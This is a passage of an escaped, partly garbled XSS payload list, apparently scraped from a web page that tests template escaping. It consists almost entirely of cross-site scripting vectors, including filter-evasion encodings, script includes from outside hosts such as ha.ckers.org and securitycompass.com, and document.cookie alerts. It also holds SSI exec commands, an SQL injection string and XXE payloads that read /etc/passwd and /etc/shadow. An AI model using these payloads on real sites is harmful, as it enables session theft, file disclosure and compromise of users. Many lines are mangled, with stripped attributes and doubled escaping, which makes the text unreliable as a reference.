SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\nPT SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;div url(http://www.securitycompass.com/xss.js);\\\"&gt; [Mozilla]\\r\\n"&gt;&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;"XSS"&#41;&gt;\\r\\nalert&#40;1&#41;\\r\\n&lt;/br &gt;\\r\\n&lt;scrscriptipt&gt;alert&#40;1&#41;&lt;/scrscriptipt&gt;\\r\\n&lt;br size=\\\\"&{alert&#40;'XSS'&#41;}\\\\"&gt;\\r\\nperl -e 'print \\\\"&lt;IMG &gt;\\\\";' &gt; out\\r\\nperl -e 'print \\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\"XSS\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\";' &gt; out\\r\\n&lt;~/XSS/*-*/&gt;\\r\\n&lt;~/XSS/*-*/&gt;\\r\\n&lt;~/XSS/*-*/&gt;\\r\\n&lt;~/XSS &gt;\\r\\n\\\"&gt;\\r\\n&lt;/XSS/*-*/&gt;\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\nXSS STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;/XSS &gt;\\r\\n\\\';;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";;alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;;;\\\";&gt;;\\\';&gt;;;alert&#40;String.fromCharCode(88,83,83&#41;);\\r\\n\\\';\\\';;!--\\\";&lt;;XSS&gt;;=&;{()}\\r\\n;alert&#40;\\\';XSS\\\';&#41;;\\r\\nSRC=http://ha.ckers.org/xss.js&gt;;;\\r\\n;alert&#40;String.fromCharCode(88,83,83&#41;);\\r\\n&lt;;BASE HREF=\\\";(\\\';XSS\\\';);//\\\";&gt;;\\r\\n&lt;;BGSOUND SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;BODY BACKGROUND=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;BODY &gt;;\\r\\n&lt;;DIV url((\\\';XSS\\\';))\\\";&gt;;\\r\\n&lt;;DIV url(&;#1;(\\\';XSS\\\';))\\\";&gt;;\\r\\n&lt;;DIV alert&#40;\\\';XSS\\\';&#41;);\\\";&gt;;\\r\\n&lt;;FRAMESET&gt;;&lt;;FRAME SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;&lt;;/FRAMESET&gt;;\\r\\n&lt;;IFRAME SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;&lt;;/IFRAME&gt;;\\r\\n&lt;;INPUT TYPE=\\\";IMAGE\\\"; SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=(\\\';XSS\\\';)&gt;;\\r\\n&lt;;IMG DYNSRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG LOWSRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\";&gt;;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser\\r\\nexp/*&lt;;XSS &gt;;li {list-style-image: url(\\\";('XSS')\\\";);}&lt;;/STYLE&gt;;&lt;;UL&gt;;&lt;;LI&gt;;XSS\\r\\n&lt;;IMG SRC=\\\';(\\\";XSS\\\";)\\\';&gt;;\\r\\n&lt;;LAYER SRC=\\\";http://ha.ckers.org/scriptlet.html\\\";&gt;;&lt;;/LAYER&gt;;\\r\\n&lt;;IMG SRC=\\\";\\\";&gt;;\\r\\n;\\r\\n&lt;;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\";&gt;;\\r\\n&lt;;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0; URL=http://;URL=(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";\\\";&gt;;\\r\\n&lt;;OBJECT TYPE=\\\";text/x-scriptlet\\\"; DATA=\\\";http://ha.ckers.org/scriptlet.html\\\";&gt;;&lt;;/OBJECT&gt;;\\r\\n&lt;;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;;&lt;;param name=url value=(\\\';XSS\\\';)&gt;;&lt;;/OBJECT&gt;;\\r\\n&lt;;EMBED SRC=\\\";http://ha.ckers.org/xss.swf\\\"; AllowScriptAccess=\\\";always\\\";&gt;;&lt;;/EMBED&gt;;\\r\\na=\\\";get\\\";;&;#10;b=\\\";URL(\\\";\\\";;&;#10;c=\\\";\\\";;&;#10;d=\\\";alert&#40;\\\';XSS\\\';&#41;;\\\";)\\\";; eval&#40;a+b+c+d&#41;;\\r\\n&lt;;STYLE TYPE=\\\";text/javascript\\\";&gt;;alert&#40;\\\';XSS\\\';&#41;;&lt;;/STYLE&gt;;\\r\\n&lt;;IMG &gt;;\\r\\n&lt;;XSS &gt;;\\r\\n&lt;;STYLE&gt;;.XSS{background-image:url(\\\";(\\\';XSS\\\';)\\\";);}&lt;;/STYLE&gt;;&lt;;A CLASS=XSS&gt;;&lt;;/A&gt;;\\r\\n&lt;;STYLE type=\\\";text/css\\\";&gt;;BODY{background:url(\\\";(\\\';XSS\\\';)\\\";)}&lt;;/STYLE&gt;;\\r\\n&lt;;LINK REL=\\\";stylesheet\\\"; HREF=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;LINK REL=\\\";stylesheet\\\"; HREF=\\\";http://ha.ckers.org/xss.css\\\";&gt;;\\r\\n&lt;;STYLE&gt;;@import\\\';http://ha.ckers.org/xss.css\\\';;&lt;;/STYLE&gt;;\\r\\n&lt;;META HTTP-EQUIV=\\\";Link\\\"; Content=\\\";&lt;;http://ha.ckers.org/xss.css&gt;;; REL=stylesheet\\\";&gt;;\\r\\n&lt;;STYLE&gt;;BODY{:url(\\\";http://ha.ckers.org/xssmoz.xml#xss\\\";)}&lt;;/STYLE&gt;;\\r\\n&lt;;TABLE BACKGROUND=\\\";(\\\';XSS\\\';)\\\";&gt;;&lt;;/TABLE&gt;;\\r\\n&lt;;TABLE&gt;;&lt;;TD BACKGROUND=\\\";(\\\';XSS\\\';)\\\";&gt;;&lt;;/TD&gt;;&lt;;/TABLE&gt;;\\r\\n&lt;;HTML xmlns:xss&gt;;\\r\\n&lt;;XML ID=I&gt;;&lt;;X&gt;;&lt;;C&gt;;&lt;;![CDATA[&lt;;IMG SRC=\\\";javas]]&gt;;&lt;;![CDATA[cript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;]]&gt;;\\r\\n&lt;;XML ID=\\\";xss\\\";&gt;;&lt;;I&gt;;&lt;;B&gt;;&lt;;IMG SRC=\\\";javas&lt;;!-- --&gt;;cript:alert&#40;\\\';XSS\\\';&#41;\\\";&gt;;&lt;;/B&gt;;&lt;;/I&gt;;&lt;;/XML&gt;;\\r\\n&lt;;XML SRC=\\\";http://ha.ckers.org/xsstest.xml\\\"; ID=I&gt;;&lt;;/XML&gt;;\\r\\n&lt;;HTML&gt;;&lt;;BODY&gt;;\\r\\n&lt;;!--[if gte IE 4]&gt;; \\r\\n&lt;;META HTTP-EQUIV=\\\";Set-Cookie\\\"; Content=\\\";USERID=;alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;XSS &gt;;\\r\\nSRC=\\\";http://ha.ckers.org/xss.jpg\\\";&gt;;;\\r\\n&lt;;!--#exec cmd=\\\";/bin/echo \\\';SRC\\\';\\\";--&gt;;&lt;;!--#exec cmd=\\\";/bin/echo \\\';=http://ha.ckers.org/xss.js&gt;;;\\\';\\\";--&gt;;\\r\\n&lt;;? echo(\\\';&lt;;SCR)\\\';;\\r\\n&lt;;BR SIZE=\\\";&;{alert&#40;\\\';XSS\\\';&#41;}\\\";&gt;;\\r\\n&lt;;IMG SRC=(\\\';XSS\\\';)&gt;;\\r\\n&lt;;IMG SRC=(&;quot;XSS&;quot;)&gt;;\\r\\n&lt;;IMG SRC=`(\\\";RSnake says, \\\';XSS\\\';\\\";)`&gt;;\\r\\n&lt;;IMG SRC=(String.fromCharCode(88,83,83))&gt;;\\r\\n&lt;;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;&gt;;\\r\\n&lt;;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041&gt;;\\r\\n&lt;;DIV &gt;;\\r\\n&lt;;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29&gt;;\\r\\n&lt;;HEAD&gt;;&lt;;META HTTP-EQUIV=\\\";CONTENT-TYPE\\\"; CONTENT=\\\";text/html; charset=UTF-7\\\";&gt;; &lt;;/HEAD&gt;;\\r\\n\\\\\\\";;alert&#40;\\\';XSS\\\';&#41;;//\\r\\n&lt;;/TITLE&gt;;;alert&#40;\\\"XSS\\\"&#41;;;\\r\\n&lt;;STYLE&gt;;@im\\\\port\\\';\\\\ja\\\\vasc\\\\ript:alert&#40;\\\";XSS\\\";&#41;\\\';;&lt;;/STYLE&gt;;\\r\\n&lt;;IMG SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";jav&;#x09;ascript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";jav&;#x0A;ascript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";jav&;#x0D;ascript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;IMG&#x0D;SRC&#x0D;=&#x0D;\\\";&#x0D;javascript&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;\\\';&#x0D;X&#x0D;S&#x0D;S&#x0D;\\\';&#x0D;)&#x0D;\\\";&#x0D;&gt;;&#x0D;\\r\\nperl -e \\\';print \\\";&lt;;IM SRC=java\\\\0script:alert&#40;\\\";XSS\\\";&#41;&gt;\\\";;\\\';&gt;; out\\r\\nperl -e \\\';print \\\";&;&lt;;SCR\\\\0IPT&gt;;alert&#40;\\\";XSS\\\";&#41;&lt;;/SCR\\\\0IPT&gt;;\\\";;\\\'; &gt;; out\\r\\n&lt;;IMG SRC=\\\"; &;#14; (\\\';XSS\\\';);\\\";&gt;;\\r\\nXSS SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\n&lt;;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\";XSS\\\";&#41;&gt;;\\r\\nSRC=http://ha.ckers.org/xss.js\\r\\nSRC=//ha.ckers.org/.j&gt;;\\r\\n&lt;;IMG SRC=\\\";(\\\';XSS\\\';)\\\";\\r\\n&lt;;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;;\\r\\n;alert&#40;\\\";XSS\\\";&#41;;//;\\r\\n&lt;;IMG \\\";\\\";\\\";&gt;;;alert&#40;\\\";XSS\\\";&#41;;\\\";&gt;;\\r\\n;a=/XSS/\\r\\na=\\\";&gt;;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\n=\\\";blah\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\na=\\\";blah\\\"; \\\';\\\'; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\n\\\";a=\\\';&gt;;\\\';\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\na=`&gt;;` SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\n;(\\\";&lt;;SCRI\\\";);;PT SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\na=\\\";&gt;\\\';&gt;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;;\\r\\n&lt;;A HREF=\\\";http://66.102.7.147/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://www.google.com\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://1113982867/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://0x42.0x0000066.0x7.0x93/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://0102.0146.0007.00000223/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";h tt p://6&;#09;6.000146.0x7.147/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";//www.google.com/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";//google\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://ha.ckers.org@google\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://google:ha.ckers.org\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://google.com/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://www.google.com./\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";\\\';http://www.google.com/\\\';\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://www.gohttp://www.google.com/ogle.com/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\&gt;\\ &gt;&gt;\\&gt;\\&gt;\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\&gt;\\&gt;\\&gt;&lt;/LAYER&gt;\\r\\n&lt;link REL=\\\"stylesheet\\\" HREF=\\\";\\\"&gt;\\r\\n&lt;style&gt;li {list-style-image: url(\\\";\\\");&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;img &gt;\\&gt;\\&gt;\\&gt;&lt;/iframe&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\";\\\"&gt;&lt;/frameset&gt;\\r\\n&lt;table BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;table&gt;&lt;TD BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;div url(;)\\\"&gt;\\r\\n&lt;div url(&#1;;)\\\"&gt;\\r\\n&lt;div document.vulnerable=true);\\\"&gt;\\r\\n&lt;style&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';&lt;/style&gt;\\r\\n&lt;img &gt;\\&gt;\\r\\nexp/*&lt;A &gt;\\r\\n&lt;style TYPE=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;style&gt;.XSS{background-image:url(\\\"\\\");}&lt;/STYLE&gt;&lt;A &gt;&lt;/a&gt;\\r\\n&lt;style type=\\\"text/css\\\"&gt;BODY{background:url(\\\"\\\")}&lt;/style&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;![endif]--&gt;\\r\\n&lt;base HREF=\\\";//\\\"&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=&gt;&lt;/object&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG &gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;\\r\\n&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG &gt;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/span&gt;\\r\\n&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSSdocument.vulnerable=true\\\"&gt;&lt;/BODY&gt;&lt;/html&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';echo(\\\'IPT&gt;document.vulnerable=true\\\'); ?&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\\\"&gt;\\r\\n&lt;head&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;a &gt;\\r\\n&lt;div &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;input type=\\\"image\\\" dynsrc=\\\";\\\"&gt;\\r\\n&lt;bgsound src=\\\";\\\"&gt;\\r\\n&\\r\\n&{document.vulnerable=true;};\\r\\n&lt;img &gt;\\&gt;\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;a &gt;document.vulnerable=true;\\\"&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\"&gt;\\r\\n&lt;body &gt;\\r\\n&lt;div url(;);\\\"&gt;\\r\\n&lt;div url([link to code]);\\\"&gt;\\r\\n&lt;div url([link to code]);\\\"&gt;\\r\\n&lt;div document.vulnerable=true;);\\\"&gt;\\r\\n&lt;style type=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;object classid=\\\"clsid:...\\\" codebase=\\\";\\\"&gt;\\r\\n&lt;style&gt;&lt;!--&lt;/style&gt;\\r\\n&lt;\\r\\n\\r\\n&lt;!-- -- --&gt;&lt;!-- -- --&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\\" =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;xml src=\\\";\\\"&gt;\\r\\n&lt;xml id=\\\"X\\\"&gt;&lt;a&gt;&lt;b&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;\\r\\n&lt;div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"&gt;&lt;/div&gt;\\r\\n[\\\\xC0][\\\\xBC]script&gt;document.vulnerable=true;[\\\\xC0][\\\\xBC]/script&gt;\\r\\n&lt;style&gt;@import\\\'http://www.securitycompass.com/xss.css\\\';&lt;/style&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;style&gt;BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}&lt;/style&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"&gt;&lt;/object&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;\\r\\n\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'&lt;SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js&gt;\\\'\\\"--&gt;\\r\\n\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n` SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n\\\'&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\nPT SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;div url(http://www.securitycompass.com/xss.js);\\\"&gt; [Mozilla]\\r\\n\\\";&gt;;&lt;;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\";XSS\\\";&#41;&gt;;\\r\\n;;alert&#40;1&#41;;\\r\\n&lt;;/br &gt;;\\r\\n&lt;;scrscriptipt&gt;;alert&#40;1&#41;&lt;;/scrscriptipt&gt;;\\r\\n&lt;;br size=\\\\\\\";&;{alert&#40;'XSS'&#41;}\\\\\\\";&gt;;\\r\\nperl -e 'print \\\\\\\";&lt;;IMG SRC=java\\\\0script:alert&#40;\\\\\\\";XSS\\\\\\\";&#41;&gt;;\\\\\\\";;' &gt;; out\\r\\nperl -e 'print \\\\\\\";&lt;;SCR\\\\0IPT&gt;;alert&#40;\\\\\\\";XSS\\\\\\\";&#41;&lt;;/SCR\\\\0IPT&gt;;\\\\\\\";;' &gt;; out\\r\\n&lt;~/XSS/*-*/&gt;\\r\\n&lt;~/XSS/*-*/&gt;\\r\\n&lt;~/XSS/*-*/&gt;\\r\\n&lt;~/XSS &gt;\\r\\n\\\"&gt;\\r\\n&lt;/XSS/*-*/&gt;\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\nXSS STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;/XSS &gt;\\r\\n&gt;\\\"&gt;&\\r\\n\\\"&gt;&lt;STYLE&gt;@import\\\"(\\\'XSS\\\')\\\";&lt;/STYLE&gt;\\r\\n&gt;\\\"\\\'&gt;&lt;img &gt;\\r\\n&gt;"'&gt;&lt;img src=""&gt;\\r\\n\\\'<script>alert&#40;\\\'XSS\\\'&#41;</script>\\\'\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;")&gt;\\r\\n&lt;IMGSRC=java&&lt;WBR&gt;#115;crip&&lt;WBR&gt;#116;:ale&&lt;WBR&gt;#114;t('XS&lt;WBR&gt;;S')&gt;\\r\\n&lt;IMGSRC=ja&&lt;WBR&gt;#0000118as&&lt;WBR&gt;#0000099ri&&lt;WBR&gt;#0000112t:&&lt;WBR&gt;#0000097le&&lt;WBR&gt;#0000114t(&&lt;WBR&gt;#0000039XS&&lt;WBR&gt;#0000083')&gt; \\r\\n&lt;IMGSRC=javas&&lt;WBR&gt;#x63ript:&&lt;WBR&gt;#x61lert(&&lt;WBR&gt;#x27XSS')&gt;\\r\\n&lt;IMG &gt;\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG &gt;\\\'XSS\\\');\\\"&gt;\\r\\n&lt;![CDATA[]]&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;foo&gt;&lt;![CDATA[![CDATA[&gt;]]&gt;alert&#40;\\\'gotcha\\\'&#41;;&lt;![CDATA[![CDATA[&gt;]]&gt;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;foo&gt;&lt;![CDATA[\\\' or 1=1 or \\\'\\\'=\\\']]&gt;&lt;/foof&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file://c:/boot.ini\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file:///etc/passwd\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file:///etc/shadow\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\"file:///dev/random\\\"&gt;]&gt;&lt;foo&gt;&xee;&lt;/foo&gt;\\r\\n\\r\\n\\r\\n"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt; \\r\\n&lt;img &gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\&gt;\\&gt;\\&gt;\\r\\n&lt;IMG &gt;alert&#40;\\\"XSS\\\"&#41;;//\\r\\n\\r\\n\\\"&gt;&lt;s\\\"+\\\"cript&gt;alert&#40;&#41;\\r\\nfoo\\r\\n&lt;scralert&#40;1&#41;\\r\\n\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;\\r\\n&lt;marquee &gt;=(◕_◕)=</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;body onLoad=\\\&quot;while(true) alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n\\\&#039;\\\&quot;&gt;&lt;/title&gt;&lt;script&gt;alert(1111)&lt;/script&gt;\\r\\n&lt;/textarea&gt;\\\&#039;\\\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;\\r\\n\\\&#039;\\\&quot;\\\&quot;&gt;&lt;script language=\\\&quot;JavaScript\\\&quot;&gt; alert(\\\&#039;X \\\\nS \\\\nS\\\&#039;);&lt;/script&gt;\\r\\n&lt;/script&gt;&lt;/script&gt;&lt;&lt;&lt;&lt;script&gt;&lt;&gt;&gt;&gt;&gt;&lt;&lt;&lt;script&gt;alert(123)&lt;/script&gt;\\r\\n&lt;html&gt;&lt;noalert&gt;&lt;noscript&gt;(123)&lt;/noscript&gt;&lt;script&gt;(123)&lt;/script&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n\\\&#039;&gt;&lt;/select&gt;&lt;script&gt;alert(123)&lt;/script&gt;\\r\\n\\\&#039;&gt;\\\&quot;&gt;&lt;script src = \\\&#039;http://www.site.com/XSS.js\\\&#039;&gt;&lt;/script&gt;\\r\\n}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/XSS/.source));&lt;/script&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;XSS\\\&quot;);&lt;/SCRIPT&gt;\\r\\na=\\\&quot;get\\\&quot;;b=\\\&quot;URL\\\&quot;;c=\\\&quot;javascript:\\\&quot;;d=\\\&quot;alert(\\\&#039;xss\\\&#039;);\\\&quot;;eval(a+b+c+d);\\r\\n=\\\&#039;&gt;&lt;script&gt;alert(\\\&quot;xss\\\&quot;)&lt;/script&gt;\\r\\n&lt;script+src=\\\&quot;&gt;\\\&quot;+src=\\\&quot;http://yoursite.com/xss.js?69,69\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;body background=javascript:\\\&#039;\\\&quot;&gt;&lt;script&gt;alert(navigator.userAgent)&lt;/script&gt;&gt;&lt;/body&gt;\\r\\n\\\&quot;&gt;/XaDoS/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;script src=\\\&quot;http://www.site.com/XSS.js\\\&quot;&gt;&lt;/script&gt;\\r\\n\\\&quot;&gt;/KinG-InFeT.NeT/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;\\r\\nsrc=\\\&quot;http://www.site.com/XSS.js\\\&quot;&gt;&lt;/script&gt;\\r\\ndata:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\\r\\n!--\\\&quot; 